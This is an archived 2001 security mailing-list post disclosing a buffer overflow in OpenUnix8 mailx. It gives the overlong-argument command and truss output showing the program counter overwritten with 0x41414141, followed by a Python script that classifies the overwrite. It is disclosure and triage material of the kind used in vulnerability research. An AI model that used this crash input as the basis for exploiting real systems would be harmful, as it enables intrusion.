OpenUnix8 mailx command line overflow
From: dotslash@snosoft.com
Date: 10/21/01
Date: Sun, 21 Oct 2001 12:52:10 -0700
Subject: OpenUnix8 mailx command line overflow
From: dotslash@snosoft.com
To: vuln-dev@security-focus.com
Message-Id: <1DA09243-C65D-11D5-9592-00039305969A@snosoft.com>
>
> /bin/mail is a symlink to mailx. mailx is not suid; however, it suffers
> from a common buffer overflow.
> -KF
>
> # truss mail `perl -e 'print "A" x 5122'`
> execve("/bin/mail", 0x08045F18, 0x08045F24) argc = 2
> open("//.mailrc", O_RDONLY, 0666) Err#2 ENOENT
> Incurred fault #6, FLTBOUNDS %pc = 0x202C4141
> siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
> Received signal #11, SIGSEGV [default]
> siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
> *** process killed ***
> # truss mail `perl -e 'print "A" x 5124'`
> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
> Received signal #11, SIGSEGV [default]
> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
> *** process killed ***
>
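Added example, not part of the original post: a small triage helper that reads the fault lines from the truss output quoted above and shows how many bytes of the faulting %pc match the filler byte from the test argument. It assumes a 32-bit little-endian x86 target; the function name `triage` and the verdict labels are hypothetical.

```python
import re

# Constructed sample: the fault lines from the truss output quoted above.
SAMPLE = """\
Incurred fault #6, FLTBOUNDS %pc = 0x202C4141
siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
"""

# Matches the truss fault line and captures the fault name and the 32-bit pc.
FAULT_RE = re.compile(r"Incurred fault #\d+, (\w+)\s+%pc = 0x([0-9A-Fa-f]{8})")


def triage(truss_text, filler=b"A"):
    """Return one dict per fault line: the pc, its bytes in memory order,
    and how many of those bytes equal the filler byte of the test argument."""
    findings = []
    for line in truss_text.splitlines():
        m = FAULT_RE.search(line)  # search() also matches '>'-quoted lines
        if not m:
            continue
        pc = int(m.group(2), 16)
        # Assumption: 32-bit little-endian x86, so the lowest byte comes first.
        raw = pc.to_bytes(4, "little")
        text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)
        hits = raw.count(filler)
        if hits == 4:
            verdict = "full overwrite"
        elif hits:
            verdict = "partial overwrite"
        else:
            verdict = "no filler bytes"
        findings.append({
            "fault": m.group(1),
            "pc": f"0x{pc:08X}",
            "memory_bytes": text,
            "filler_bytes": hits,
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

For the 5122-byte run the %pc decodes to the bytes "AA, " in memory order, so only the two low bytes came from the argument; the 5124-byte run replaces all four.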